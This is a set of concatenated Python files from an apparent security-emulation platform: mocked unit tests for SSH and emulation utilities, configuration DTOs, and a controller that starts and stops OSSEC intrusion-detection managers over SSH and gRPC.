from unittest.mock import patch, MagicMock
from csle_common.util.emulation_util import EmulationUtil
from csle_common.dao.emulation_observation.common.emulation_connection_observation_state import (
    EmulationConnectionObservationState,
)
from csle_common.dao.emulation_action.attacker.emulation_attacker_action_type import EmulationAttackerActionType


class TestEmulationUtilSuite:
    """
    Test suite for emulation_util
    """

    @patch("csle_common.util.ssh_util.SSHUtil.execute_ssh_cmds")
    def test_execute_ssh_cmds(self, mock_execute_ssh_cmds) -> None:
        """
        Test the method that executes a list of commands over an ssh connection to the emulation

        :param mock_execute_ssh_cmds: mock_execute_ssh_cmds
        :return: None
        """
        cmds = ["ls", "pwd", "whoami"]
        mock_conn = MagicMock()
        wait_for_completion = True

        mock_return_value = [(b"file1\nfile2\n", b"", 0.1), (b"/home/user\n", b"", 0.05), (b"user\n", b"", 0.02)]
        mock_execute_ssh_cmds.return_value = mock_return_value
        result = EmulationUtil.execute_ssh_cmds(cmds=cmds, conn=mock_conn, wait_for_completion=wait_for_completion)
        mock_execute_ssh_cmds.assert_called()
        assert result == mock_return_value

    @patch("csle_common.util.ssh_util.SSHUtil.execute_ssh_cmd")
    def test_execute_ssh_cmd(self, mock_execute_ssh_cmd) -> None:
        """
        Test the method that executes an action on the emulation over a ssh connection

        :param mock_execute_ssh_cmd: mock_execute_ssh_cmd
        :return: None
        """
        cmd = "ls -l"
        mock_conn = MagicMock()
        wait_for_completion = True
        mock_return_value = (b"file1\nfile2\n", b"", 0.1)
        mock_execute_ssh_cmd.return_value = mock_return_value
        result = EmulationUtil.execute_ssh_cmd(cmd=cmd, conn=mock_conn, wait_for_completion=wait_for_completion)
        mock_execute_ssh_cmd.assert_called()
        assert result == mock_return_value

    def test_log_measured_action_time(self) -> None:
        """
        Test the method that logs the measured time of an action to Kafka

        :return: None
        """
        total_time = 6
        action = MagicMock()
        emulation_env_config = MagicMock()
        create_producer = True
        action.to_kafka_record.return_value = "mock_record"
        EmulationUtil.log_measured_action_time(
            total_time=total_time,
            action=action,
            emulation_env_config=emulation_env_config,
            create_producer=create_producer,
        )
        action.to_kafka_record.assert_called()

    @patch("csle_common.util.ssh_util.SSHUtil.execute_ssh_cmd")
    def test_check_if_ssh_server_is_running_ssh(self, mock_execute_ssh_cmd) -> None:
        """
        Test the method that checks if an ssh server is running on the machine

        :param mock_execute_ssh_cmd: mock_execute_ssh_cmd
        :return: None
        """
        mock_conn = MagicMock()
        mock_execute_ssh_cmd.return_value = (b"sshd is running", b"", 0.1)
        result = EmulationUtil._check_if_ssh_server_is_running(conn=mock_conn, telnet=False)
        mock_execute_ssh_cmd.assert_called()
        assert result

    @patch("csle_common.util.ssh_util.SSHUtil.execute_ssh_cmd")
    def test_list_all_users_ssh(self, mock_execute_ssh_cmd) -> None:
        """
        Test the method that list all users on a machine

        :param mock_execute_ssh_cmd: mock_execute_ssh_cmd
        :return: None
        """
        mock_conn = MagicMock()
        emulation_env_config = MagicMock()
        c = EmulationConnectionObservationState(
            conn=mock_conn, credential=MagicMock(), root=False, service="ssh", port=22, ip="192.168.1.2"
        )
        mock_execute_ssh_cmd.return_value = (b"root\nuser1\nuser2\n", b"", 0.1)
        result = EmulationUtil._list_all_users(c=c, emulation_env_config=emulation_env_config, telnet=False)
        mock_execute_ssh_cmd.assert_called()
        assert result == ["root", "user1", "user2"]

    def test_is_connection_active(self) -> None:
        """
        Test the method that checks if a given connection is active or not

        :return: None
        """
        mock_conn = MagicMock()
        mock_transport = MagicMock()
        mock_transport.is_active.return_value = True
        mock_conn.get_transport.return_value = mock_transport

        result = EmulationUtil.is_connection_active(conn=mock_conn)
        assert result
        mock_conn.get_transport.assert_called()
        mock_transport.is_active.assert_called()

    @patch("paramiko.SSHClient")
    def test_setup_custom_connection(self, mock_SSHClient) -> None:
        """
        Test utility function for setting up a custom SSH connection given credentials and a proxy connection

        :param mock_SSHClient: mock_SSHClient
        :return: None
        """
        user = "user"
        pw = "password"
        source_ip = "192.168.1.1"
        port = 22
        target_ip = "192.168.1.2"
        root = True

        mock_proxy_conn = MagicMock()
        mock_transport = MagicMock()
        mock_proxy_conn.conn.get_transport.return_value = mock_transport

        mock_ssh_client = MagicMock()
        mock_SSHClient.return_value = mock_ssh_client
        mock_relay_channel = MagicMock()
        mock_transport.open_channel.return_value = mock_relay_channel
        mock_transport.is_active.return_value = True

        result = EmulationUtil.setup_custom_connection(
            user=user, pw=pw, source_ip=source_ip, port=port, target_ip=target_ip, proxy_conn=mock_proxy_conn, root=root
        )
        mock_SSHClient.assert_called()
        assert result

    def test_write_remote_file(self) -> None:
        """
        Test utility function for writing contents to a file

        :return: None
        """
        mock_conn = MagicMock()
        mock_sftp_client = MagicMock()
        mock_remote_file = MagicMock()

        mock_conn.open_sftp.return_value = mock_sftp_client
        mock_sftp_client.file.return_value = mock_remote_file

        file_name = "filename.txt"
        contents = "content"
        write_mode = "w"

        EmulationUtil.write_remote_file(conn=mock_conn, file_name=file_name, contents=contents, write_mode=write_mode)
        mock_conn.open_sftp.assert_called()
        mock_sftp_client.file.assert_called()
        mock_remote_file.write.assert_called()
        mock_remote_file.close.assert_called()

    def test_connect_admin(self) -> None:
        """
        Test the method that connects the admin agent

        :return: None
        """
        emulation_env_config = MagicMock()
        ip = "192.168.1.100"
        create_producer = True
        EmulationUtil.connect_admin(emulation_env_config=emulation_env_config, ip=ip, create_producer=create_producer)
        assert emulation_env_config.agent_ip == ip
        emulation_env_config.connect.assert_called()

    def test_disconnect_admin(self) -> None:
        """
        Test the method that disconnects the admin agent

        :return: None
        """
        emulation_env_config = MagicMock()
        EmulationUtil.disconnect_admin(emulation_env_config=emulation_env_config)
        emulation_env_config.close_all_connections.assert_called()

    def test_execute_cmd_interactive_channel(self) -> None:
        """
        Test method that executes an action on the emulation using an interactive shell (non synchronous)

        :return: None
        """
        mock_channel = MagicMock()
        cmd = "ls -la"
        EmulationUtil.execute_cmd_interactive_channel(cmd=cmd, channel=mock_channel)
        mock_channel.send.assert_called()

    @patch("csle_common.util.emulation_util.EmulationUtil.read_result_interactive_channel")
    def test_read_result_interactive(self, mock_read_result_interactive_channel) -> None:
        """
        Test the method that reads the result of an action executed in interactive mode

        :param mock_read_result_interactive_channel: mock_read_result_interactive_channel
        :return: None
        """
        mock_read_result_interactive_channel.return_value = "result"
        emulation_env_config = MagicMock()
        mock_channel = MagicMock()
        result = EmulationUtil.read_result_interactive(emulation_env_config=emulation_env_config, channel=mock_channel)
        assert result == "result"

    def test_read_result_interactive_channel(self) -> None:
        """
        Test the method that reads the result of an action executed in interactive mode

        :return: None
        """
        emulation_env_config = MagicMock()
        mock_channel = MagicMock()
        mock_channel.recv_ready.side_effect = [False, True]
        mock_channel.recv.return_value = b"Mocked result"
        mock_shell_escape = MagicMock()
        mock_shell_escape.sub.return_value = "result"
        result = EmulationUtil.read_result_interactive_channel(emulation_env_config=emulation_env_config,
                                                               channel=mock_channel)
        mock_channel.recv_ready.assert_called()
        mock_channel.recv.assert_called()
        assert result

    def test_is_emulation_defense_action_legal(self) -> None:
        """
        Test the method that checks if a given defense action is legal in the current state of the environment

        :return: None
        """
        defense_action_id = 1
        emulation_env_config = MagicMock()
        emulation_env_state = MagicMock()
        result = EmulationUtil.is_emulation_defense_action_legal(
            defense_action_id=defense_action_id, env_config=emulation_env_config, env_state=emulation_env_state)
        assert result

    @patch("csle_common.util.env_dynamics_util.EnvDynamicsUtil.logged_in_ips_str")
    def test_is_emulation_attack_action_legal(self, mock_logged_in_ips_str) -> None:
        """
        Test the method that checks if a given attack action is legal in the current state of the environment

        :param mock_logged_in_ips_str: mock_logged_in_ips_str
        :return: None
        """
        mock_env_config = MagicMock()
        mock_env_state = MagicMock()

        mock_env_state.attacker_action_config.actions = [MagicMock(id=0), MagicMock(id=1)]
        mock_env_state.attacker_obs_state = MagicMock()
        mock_env_state.attacker_obs_state.get_action_ips.return_value = "192.168.1.1"
        mock_env_state.attacker_obs_state.actions_tried = set()
        mock_env_state.attacker_obs_state.machines = [
            MagicMock(
                ips="192.168.1.1",
                logged_in=True,
                root=False,
                filesystem_searched=False,
                tools_installed=False,
                backdoor_installed=False,
                untried_credentials=True,
            )
        ]

        action_id = 1
        mock_action = MagicMock()
        mock_action.id = action_id
        mock_action.index = 0
        mock_action.type = EmulationAttackerActionType.RECON
        mock_env_state.attacker_action_config.actions[action_id] = mock_action
        result = EmulationUtil.is_emulation_attack_action_legal(action_id, mock_env_config, mock_env_state)
        assert not result

    def test_check_pid(self) -> None:
        """
        Test the method that checks if a given pid is running on the host

        :return: None
        """
        result = EmulationUtil.check_pid(1)
        assert result

    def test_physical_ip_match(self) -> None:
        """
        Test utility method for checking if a container ip matches a physical ip

        :return: None
        """
        emulation_env_config = MagicMock()
        emulation_env_config.kafka_config.container.docker_gw_bridge_ip = "192.168.0.1"
        emulation_env_config.kafka_config.container.physical_host_ip = "10.0.0.1"
        emulation_env_config.elk_config.container.docker_gw_bridge_ip = "192.168.0.2"
        emulation_env_config.elk_config.container.physical_host_ip = "10.0.0.2"
        emulation_env_config.sdn_controller_config = None

        mock_container = MagicMock()
        mock_container.physical_host_ip = "10.0.0.3"
        emulation_env_config.containers_config.get_container_from_ip.return_value = mock_container

        ip = "192.168.0.1"
        physical_host_ip = "10.0.0.1"

        result = EmulationUtil.physical_ip_match(
            emulation_env_config=emulation_env_config, ip=ip, physical_host_ip=physical_host_ip)
        assert result



from typing import List, Dict, Any
from csle_common.dao.emulation_config.node_services_config import NodeServicesConfig
from csle_common.dao.emulation_config.network_service import NetworkService
from csle_base.json_serializable import JSONSerializable


class ServicesConfig(JSONSerializable):
    """
    A DTO object representing the services configuration of an emulation environment
    """

    def __init__(self, services_configs: List[NodeServicesConfig]):
        """
        Initializes the DTO

        :param users: the list of node users configuration
        """
        self.services_configs = services_configs

    def to_dict(self) -> Dict[str, Any]:
        """
        Converts the object to a dict representation
        
        :return: a dict representation of the object
        """
        d = {}
        d["services_configs"] = list(map(lambda x: x.to_dict(), self.services_configs))
        return d

    @staticmethod
    def from_dict(d: Dict[str, Any]) -> "ServicesConfig":
        """
        Convert a dict representation to a DTO representation

        :return: a dto representation of the object
        """
        dto = ServicesConfig(services_configs=list(map(lambda x: NodeServicesConfig.from_dict(x),
                                                       d["services_configs"])))
        return dto

    def __str__(self) -> str:
        """
        :return: a string representation of the object
        """
        return "services_configs:{}".format(",".join(list(map(lambda x: str(x), self.services_configs))))

    def get_services_for_ips(self, ips: List[str]) -> List[NetworkService]:
        """
        Gets all services for a list ip addresses

        :param ips: the list of ips
        :return: the list of services
        """
        services: List[NetworkService] = []
        for service_config in self.services_configs:
            if service_config.ip in ips:
                services = services + service_config.services
        return services

    @staticmethod
    def from_json_file(json_file_path: str) -> "ServicesConfig":
        """
        Reads a json file and converts it to a DTO

        :param json_file_path: the json file path
        :return: the converted DTO
        """
        import io
        import json
        with io.open(json_file_path, 'r') as f:
            json_str = f.read()
        return ServicesConfig.from_dict(json.loads(json_str))

    def copy(self) -> "ServicesConfig":
        """
        :return: a copy of the DTO
        """
        return ServicesConfig.from_dict(self.to_dict())

    def create_execution_config(self, ip_first_octet: int) -> "ServicesConfig":
        """
        Creates a new config for an execution

        :param ip_first_octet: the first octet of the IP of the new execution
        :return: the new config
        """
        config = self.copy()
        config.services_configs = list(map(lambda x: x.create_execution_config(ip_first_octet=ip_first_octet),
                                           self.services_configs))
        return config



from typing import Dict, Any
import numpy as np
from numpy.typing import NDArray
from csle_base.json_serializable import JSONSerializable


class TransitionOperatorConfig(JSONSerializable):
    """
    DTO representing the transition operator definition of a simulation
    """

    def __init__(self, transition_tensor: NDArray[Any]):
        """
        Initializes the DTO

        :param transition_tensor: the transition tensor of the simulation
        """
        self.transition_tensor = transition_tensor

    @staticmethod
    def from_dict(d: Dict[str, Any]) -> "TransitionOperatorConfig":
        """
        Converts a dict representation to an instance

        :param d: the dict to convert
        :return: the created instance
        """
        obj = TransitionOperatorConfig(transition_tensor=d["transition_tensor"])
        return obj

    def to_dict(self) -> Dict[str, Any]:
        """
        Converts the object to a dict representation

        :return: a dict representation of the object
        """
        d: Dict[str, Any] = {}
        tensor = list(self.transition_tensor)
        for i in range(len(tensor)):
            if isinstance(tensor[i], np.ndarray):
                tensor[i] = tensor[i].tolist()
        d["transition_tensor"] = list(tensor)
        return d

    def __str__(self):
        """
        :return: a string representation of the object
        """
        return f"transition tensor: {self.transition_tensor}"

    @staticmethod
    def from_json_file(json_file_path: str) -> "TransitionOperatorConfig":
        """
        Reads a json file and converts it to a DTO

        :param json_file_path: the json file path
        :return: the converted DTO
        """
        import io
        import json
        with io.open(json_file_path, 'r') as f:
            json_str = f.read()
        return TransitionOperatorConfig.from_dict(json.loads(json_str))



import logging
from typing import List
import grpc
import time
from csle_common.dao.emulation_config.emulation_env_config import EmulationEnvConfig
from csle_common.dao.emulation_config.ossec_managers_info import OSSECIDSManagersInfo
import csle_common.constants.constants as constants
import csle_collector.constants.constants as csle_collector_constants
import csle_collector.ossec_ids_manager.ossec_ids_manager_pb2_grpc
import csle_collector.ossec_ids_manager.ossec_ids_manager_pb2
import csle_collector.ossec_ids_manager.query_ossec_ids_manager
import csle_collector.ossec_ids_manager.ossec_ids_manager_util
from csle_common.util.emulation_util import EmulationUtil


class OSSECIDSController:
    """
    Class controlling OSSEC IDS running on nodes in the emulations, as well as OSSECIDS managers
    """

    @staticmethod
    def stop_ossec_idses(emulation_env_config: EmulationEnvConfig, physical_host_ip: str, logger: logging.Logger) \
            -> None:
        """
        Utility function for stopping the OSSEC IDSes

        :param emulation_config: the emulation env configuration
        :param physical_host_ip: the physical host ip
        :param logger: the logger to use for logging
        :return: None
        """
        for c in emulation_env_config.containers_config.containers:
            if c.physical_host_ip != physical_host_ip:
                continue
            for ids_image in constants.CONTAINER_IMAGES.OSSEC_IDS_IMAGES:
                if ids_image in c.name:
                    OSSECIDSController.stop_ossec_ids(emulation_env_config=emulation_env_config,
                                                      ip=c.docker_gw_bridge_ip, logger=logger)

    @staticmethod
    def start_ossec_idses(emulation_env_config: EmulationEnvConfig, physical_server_ip: str,
                          logger: logging.Logger) -> None:
        """
        Utility function for starting the OSSEC IDSes

        :param emulation_config: the emulation env configuration
        :param physical_server_ip: the ip of the physical server
        :param logger: the logger to use for logging
        :return: None
        """
        for c in emulation_env_config.containers_config.containers:
            if c.physical_host_ip != physical_server_ip:
                continue
            for ids_image in constants.CONTAINER_IMAGES.OSSEC_IDS_IMAGES:
                if ids_image in c.name:
                    logger.info(f"Starting the OSSEC IDS on ip: {c.docker_gw_bridge_ip} ({c.get_ips()[0]}, "
                                f"{c.get_full_name()})")
                    OSSECIDSController.start_ossec_ids(emulation_env_config=emulation_env_config,
                                                       ip=c.docker_gw_bridge_ip, logger=logger)

    @staticmethod
    def start_ossec_ids(emulation_env_config: EmulationEnvConfig, ip: str, logger: logging.Logger) -> None:
        """
        Utility function for starting a OSSEC IDS with a specific IP

        :param emulation_config: the emulation env configuration
        :param ip: the IP of the node where the OSSEC IDS should be started
        :param logger: the logger to use for logging
        :return: None
        """
        OSSECIDSController.start_ossec_ids_manager(emulation_env_config=emulation_env_config, ip=ip, logger=logger)
        ids_monitor_dto = OSSECIDSController.get_ossec_ids_monitor_thread_status_by_ip_and_port(
            port=emulation_env_config.ossec_ids_manager_config.ossec_ids_manager_port, ip=ip)
        if not ids_monitor_dto.ossec_ids_running:
            # Open a gRPC session
            with grpc.insecure_channel(
                    f'{ip}:'
                    f'{emulation_env_config.ossec_ids_manager_config.ossec_ids_manager_port}',
                    options=constants.GRPC_SERVERS.GRPC_OPTIONS) as channel:
                stub = csle_collector.ossec_ids_manager.ossec_ids_manager_pb2_grpc.OSSECIdsManagerStub(channel)
                logger.info(f"Starting OSSEC IDS on {ip}.")
                csle_collector.ossec_ids_manager.query_ossec_ids_manager.start_ossec_ids(stub=stub)

    @staticmethod
    def stop_ossec_ids(emulation_env_config: EmulationEnvConfig, ip: str, logger: logging.Logger) -> None:
        """
        Utility function for stopping an OSSEC IDS with a specific IP

        :param emulation_config: the emulation env configuration
        :param ip: the IP of the node where the OSSEC IDS should be stopped
        :param logger: the logger to use for logging
        :return: None
        """
        OSSECIDSController.start_ossec_ids_manager(emulation_env_config=emulation_env_config, ip=ip, logger=logger)
        ids_monitor_dto = OSSECIDSController.get_ossec_ids_monitor_thread_status_by_ip_and_port(
            port=emulation_env_config.ossec_ids_manager_config.ossec_ids_manager_port, ip=ip)
        if ids_monitor_dto.ossec_ids_running:
            # Open a gRPC session
            with grpc.insecure_channel(
                    f'{ip}:'
                    f'{emulation_env_config.ossec_ids_manager_config.ossec_ids_manager_port}',
                    options=constants.GRPC_SERVERS.GRPC_OPTIONS) as channel:
                stub = csle_collector.ossec_ids_manager.ossec_ids_manager_pb2_grpc.OSSECIdsManagerStub(channel)
                logger.info(f"Stopping OSSEC IDS on {ip}.")
                csle_collector.ossec_ids_manager.query_ossec_ids_manager.stop_ossec_ids(stub=stub)

    @staticmethod
    def start_ossec_idses_managers(emulation_env_config: EmulationEnvConfig, physical_server_ip: str,
                                   logger: logging.Logger) -> None:
        """
        Utility method for starting OSSEC IDS managers

        :param emulation_env_config: the emulation env config
        :param physical_server_ip: the ip of the physical server
        :param logger: the logger to use for logging
        :return: None
        """
        for c in emulation_env_config.containers_config.containers:
            if c.physical_host_ip != physical_server_ip:
                continue
            for ids_image in constants.CONTAINER_IMAGES.OSSEC_IDS_IMAGES:
                if ids_image in c.name:
                    OSSECIDSController.start_ossec_ids_manager(emulation_env_config=emulation_env_config,
                                                               ip=c.docker_gw_bridge_ip, logger=logger)

    @staticmethod
    def start_ossec_ids_manager(emulation_env_config: EmulationEnvConfig, ip: str, logger: logging.Logger) -> None:
        """
        Utility method for starting the OSSEC IDS manager on a specific container

        :param emulation_env_config: the emulation env config
        :param ip: the ip of the container
        :param logger: the logger to use for logging
        :return: None
        """
        # Check if ids_manager is already running
        status = None
        not_running = False
        try:
            status = OSSECIDSController.get_ossec_ids_monitor_thread_status_by_ip_and_port(
                ip=ip,
                port=emulation_env_config.ossec_ids_manager_config.ossec_ids_manager_port, timeout=5)
        except Exception:
            not_running = True
        status_str = ""
        if status is None:
            not_running = True
        else:
            status_str = f"monitor running: {status.monitor_running}, ossec_ids_running: {status.ossec_ids_running}"
        if not_running:
            logger.info(f"Starting OSSEC IDS manager on node {ip}")

            # Connect
            EmulationUtil.connect_admin(emulation_env_config=emulation_env_config, ip=ip)

            # Stop old background job if running
            cmd = (constants.COMMANDS.SUDO + constants.COMMANDS.SPACE_DELIM + constants.COMMANDS.PKILL +
                   constants.COMMANDS.SPACE_DELIM + constants.TRAFFIC_COMMANDS.OSSEC_IDS_MANAGER_FILE_NAME)
            o, e, _ = EmulationUtil.execute_ssh_cmd(
                cmd=cmd, conn=emulation_env_config.get_connection(ip=ip))

            # Start the OSSEC ids_manager
            cmd = constants.COMMANDS.START_OSSEC_IDS_MANAGER.format(
                emulation_env_config.ossec_ids_manager_config.ossec_ids_manager_port,
                emulation_env_config.ossec_ids_manager_config.ossec_ids_manager_log_dir,
                emulation_env_config.ossec_ids_manager_config.ossec_ids_manager_log_file,
                emulation_env_config.ossec_ids_manager_config.ossec_ids_manager_max_workers)
            o, e, _ = EmulationUtil.execute_ssh_cmd(
                cmd=cmd, conn=emulation_env_config.get_connection(ip=ip))
            time.sleep(2)
        else:
            logger.info(f"OSSEC IDS manager was already running on node {ip}. Status: {status_str}")

    @staticmethod
    def stop_ossec_idses_managers(emulation_env_config: EmulationEnvConfig, physical_server_ip: str,
                                  logger: logging.Logger) -> None:
        """
        Utility method for stopping ossec ids managers

        :param emulation_env_config: the emulation env config
        :param physical_server_ip: the IP of the physical host
        :param logger: the logger to use for logging
        :return: None
        """
        for c in emulation_env_config.containers_config.containers:
            if c.physical_host_ip != physical_server_ip:
                continue
            for ids_image in constants.CONTAINER_IMAGES.OSSEC_IDS_IMAGES:
                if ids_image in c.name:
                    OSSECIDSController.stop_ossec_ids_manager(emulation_env_config=emulation_env_config,
                                                              ip=c.docker_gw_bridge_ip, logger=logger)

    @staticmethod
    def stop_ossec_ids_manager(emulation_env_config: EmulationEnvConfig, ip: str, logger: logging.Logger) -> None:
        """
        Utility method for stopping an ossec ids manager with a speicific IP

        :param emulation_env_config: the emulation env config
        :param ip: the ip of the container
        :param logger: the logger to use for logging
        :return: None
        """
        # Connect
        EmulationUtil.connect_admin(emulation_env_config=emulation_env_config, ip=ip)

        logger.info(f"Stopping OSSEC IDS manager on node {ip}")

        cmd = (constants.COMMANDS.SUDO + constants.COMMANDS.SPACE_DELIM + constants.COMMANDS.PKILL +
               constants.COMMANDS.SPACE_DELIM + constants.TRAFFIC_COMMANDS.OSSEC_IDS_MANAGER_FILE_NAME)
        o, e, _ = EmulationUtil.execute_ssh_cmd(
            cmd=cmd, conn=emulation_env_config.get_connection(ip=ip))
        time.sleep(2)

    @staticmethod
    def start_ossec_idses_monitor_threads(emulation_env_config: EmulationEnvConfig, physical_server_ip: str,
                                          logger: logging.Logger) -> None:
        """
        A method that sends a request to the OSSECIDSManager on every container that runs
        an IDS to start the IDS manager and the monitor thread

        :param emulation_env_config: the emulation env config
        :param physical_server_ip: the ip of the physical server
        :param logger: the logger to use for logging
        :return: None
        """
        OSSECIDSController.start_ossec_idses_managers(emulation_env_config=emulation_env_config,
                                                      physical_server_ip=physical_server_ip, logger=logger)

        for c in emulation_env_config.containers_config.containers:
            if c.physical_host_ip != physical_server_ip:
                continue
            for ids_image in constants.CONTAINER_IMAGES.OSSEC_IDS_IMAGES:
                if ids_image in c.name:
                    logger.info(f"Starting OSSEC IDS monitor thread on IP: {c.docker_gw_bridge_ip} "
                                f"({c.get_ips()[0]}, {c.get_full_name()})")
                    OSSECIDSController.start_ossec_ids_monitor_thread(emulation_env_config=emulation_env_config,
                                                                      ip=c.docker_gw_bridge_ip, logger=logger)

    @staticmethod
    def start_ossec_ids_monitor_thread(emulation_env_config: EmulationEnvConfig, ip: str,
                                       logger: logging.Logger) -> None:
        """
        A method that sends a request to the OSSECIDSManager on a specific IP to start
        to start the IDS manager and the monitor thread

        :param emulation_env_config: the emulation env config
        :param ip: the ip of the container
        :param logger: the logger to use for logging
        :return: None
        """
        OSSECIDSController.start_ossec_ids_manager(emulation_env_config=emulation_env_config, ip=ip, logger=logger)
        ids_monitor_dto = OSSECIDSController.get_ossec_ids_monitor_thread_status_by_ip_and_port(
            port=emulation_env_config.ossec_ids_manager_config.ossec_ids_manager_port, ip=ip)
        if not ids_monitor_dto.monitor_running:
            logger.info(f"OSSEC IDS monitor thread is not running on {ip}, starting it.")
            with grpc.insecure_channel(
                    f'{ip}:'
                    f'{emulation_env_config.ossec_ids_manager_config.ossec_ids_manager_port}',
                    options=constants.GRPC_SERVERS.GRPC_OPTIONS) as channel:
                stub = csle_collector.ossec_ids_manager.ossec_ids_manager_pb2_grpc.OSSECIdsManagerStub(channel)
                csle_collector.ossec_ids_manager.query_ossec_ids_manager.start_ossec_ids_monitor(
                    stub=stub, kafka_ip=emulation_env_config.kafka_config.container.get_ips()[0],
                    kafka_port=emulation_env_config.kafka_config.kafka_port,
                    log_file_path=csle_collector_constants.OSSEC.OSSEC_ALERTS_FILE,
                    time_step_len_seconds=emulation_env_config.kafka_config.time_step_len_seconds)

    @staticmethod
    def stop_ossec_ids_monitor_thread(emulation_env_config: EmulationEnvConfig, ip: str,
                                      logger: logging.Logger) -> None:
        """
        A method that sends a request to the OSSECIDSManager for a specific IP to stop the monitor threads

        :param emulation_env_config: the emulation env config
        :param ip: the ip of the container
        :param logger: the logger to use for logging
        :return: None
        """
        OSSECIDSController.start_ossec_ids_manager(emulation_env_config=emulation_env_config, ip=ip, logger=logger)
        # Open a gRPC session
        with grpc.insecure_channel(
                f'{ip}:'
                f'{emulation_env_config.ossec_ids_manager_config.ossec_ids_manager_port}',
                options=constants.GRPC_SERVERS.GRPC_OPTIONS) as channel:
            stub = csle_collector.ossec_ids_manager.ossec_ids_manager_pb2_grpc.OSSECIdsManagerStub(channel)
            logger.info(f"Stopping the OSSEC IDS monitor thread on {ip}.")
            csle_collector.ossec_ids_manager.query_ossec_ids_manager.stop_ossec_ids_monitor(stub=stub)

    @staticmethod
    def stop_ossec_idses_monitor_threads(emulation_env_config: EmulationEnvConfig, physical_server_ip: str,
                                         logger: logging.Logger) -> None:
        """
        A method that sends a request to the OSSECIDSManager on every container that runs
        an IDS to stop the monitor threads

        :param emulation_env_config: the emulation env config
        :param physical_server_ip: the ip of the physical server
        :param logger: the logger to use for logging
        :return: None
        """
        for c in emulation_env_config.containers_config.containers:
            if c.physical_host_ip != physical_server_ip:
                continue
            for ids_image in constants.CONTAINER_IMAGES.OSSEC_IDS_IMAGES:
                if ids_image in c.name:
                    OSSECIDSController.stop_ossec_ids_monitor_thread(emulation_env_config=emulation_env_config,
                                                                     ip=c.docker_gw_bridge_ip, logger=logger)

    @staticmethod
    def get_ossec_idses_monitor_threads_statuses(
            emulation_env_config: EmulationEnvConfig, physical_server_ip: str, logger: logging.Logger) \
            -> List[csle_collector.ossec_ids_manager.ossec_ids_manager_pb2.OSSECIdsMonitorDTO]:
        """
        A method that sends a request to the OSSECIDSManager on every container to get the status of the
        IDS monitor thread

        :param emulation_env_config: the emulation config
        :param physical_server_ip: the IP of the physical server
        :param logger: the logger to use for logging
        :return: List of monitor thread statuses
        """
        statuses = []
        OSSECIDSController.start_ossec_idses_managers(emulation_env_config=emulation_env_config,
                                                      physical_server_ip=physical_server_ip, logger=logger)

        for c in emulation_env_config.containers_config.containers:
            if c.physical_host_ip != physical_server_ip:
                continue
            for ids_image in constants.CONTAINER_IMAGES.OSSEC_IDS_IMAGES:
                if ids_image in c.name:
                    status = OSSECIDSController.get_ossec_ids_monitor_thread_status_by_ip_and_port(
                        port=emulation_env_config.ossec_ids_manager_config.ossec_ids_manager_port,
                        ip=c.docker_gw_bridge_ip)
                    statuses.append(status)
        return statuses

    @staticmethod
    def get_ossec_idses_managers_ips(emulation_env_config: EmulationEnvConfig) -> List[str]:
        """
        A method that extracts the IPS of the OSSEC IDS managers in a given emulation

        :param emulation_env_config: the emulation env config
        :return: the list of IP addresses
        """
        ips = []
        for c in emulation_env_config.containers_config.containers:
            for ids_image in constants.CONTAINER_IMAGES.OSSEC_IDS_IMAGES:
                if ids_image in c.name:
                    ips.append(c.docker_gw_bridge_ip)
        return ips

    @staticmethod
    def get_ossec_idses_managers_ports(emulation_env_config: EmulationEnvConfig) -> List[int]:
        """
        A method that extracts the ports of the OSSEC IDS managers in a given emulation

        :param emulation_env_config: the emulation env config
        :return: the list of ports
        """
        ports = []
        for c in emulation_env_config.containers_config.containers:
            for ids_image in constants.CONTAINER_IMAGES.OSSEC_IDS_IMAGES:
                if ids_image in c.name:
                    ports.append(emulation_env_config.ossec_ids_manager_config.ossec_ids_manager_port)
        return ports

    @staticmethod
    def get_ossec_ids_monitor_thread_status_by_ip_and_port(
            port: int, ip: str, timeout: int = csle_collector_constants.GRPC.TIMEOUT_SECONDS) \
            -> csle_collector.ossec_ids_manager.ossec_ids_manager_pb2.OSSECIdsMonitorDTO:
        """
        A method that sends a request to the OSSECIDSManager with a specific port and ip
        to get the status of the IDS monitor thread

        :param port: the port of the OSSECIDSManager
        :param ip: the ip of the OSSECIDSManager
        :param timeout: the timeout of the GRPC query
        :return: the status of the OSSECIDSManager
        """
        with grpc.insecure_channel(f'{ip}:{port}', options=constants.GRPC_SERVERS.GRPC_OPTIONS) as channel:
            stub = csle_collector.ossec_ids_manager.ossec_ids_manager_pb2_grpc.OSSECIdsManagerStub(channel)
            status = \
                csle_collector.ossec_ids_manager.query_ossec_ids_manager.get_ossec_ids_monitor_status(
                    stub=stub, timeout=timeout)
            return status

    @staticmethod
    def get_ossec_managers_info(emulation_env_config: EmulationEnvConfig, active_ips: List[str],
                                logger: logging.Logger, physical_host_ip: str) \
            -> OSSECIDSManagersInfo:
        """
        Extracts the information of the OSSEC IDS managers for a given emulation

        :param emulation_env_config: the configuration of the emulation
        :param active_ips: list of active IPs
        :param physical_host_ip: the physical host ip
        :param logger: the logger to use for logging
        :return: a DTO with the status of the OSSEC IDS managers
        """
        ossec_ids_managers_ips = \
            OSSECIDSController.get_ossec_idses_managers_ips(emulation_env_config=emulation_env_config)
        ossec_ids_managers_ports = \
            OSSECIDSController.get_ossec_idses_managers_ports(emulation_env_config=emulation_env_config)
        ossec_ids_managers_statuses = []
        ossec_ids_managers_running = []
        for ip in ossec_ids_managers_ips:
            if ip not in active_ips or not EmulationUtil.physical_ip_match(
                    emulation_env_config=emulation_env_config, ip=ip, physical_host_ip=physical_host_ip):
                continue
            running = False
            status = None
            try:
                status = OSSECIDSController.get_ossec_ids_monitor_thread_status_by_ip_and_port(
                    port=emulation_env_config.ossec_ids_manager_config.ossec_ids_manager_port, ip=ip)
                running = True
            except Exception as e:
                logger.debug(f"Could not fetch OSSEC IDS manager status on IP:{ip}, error: {str(e)}, {repr(e)}")
            if status is not None:
                ossec_ids_managers_statuses.append(status)
            else:
                util = csle_collector.ossec_ids_manager.ossec_ids_manager_util.OSSecManagerUtil
                ossec_ids_managers_statuses.append(util.ossec_ids_monitor_dto_empty())
            ossec_ids_managers_running.append(running)
        execution_id = emulation_env_config.execution_id
        emulation_name = emulation_env_config.name
        ossec_manager_info_dto = OSSECIDSManagersInfo(
            ossec_ids_managers_running=ossec_ids_managers_running, ips=ossec_ids_managers_ips,
            execution_id=execution_id,
            emulation_name=emulation_name, ossec_ids_managers_statuses=ossec_ids_managers_statuses,
            ports=ossec_ids_managers_ports)
        return ossec_manager_info_dto



from typing import List, Tuple, Union
import logging
import subprocess
import time
import docker
import re
import os
import grpc
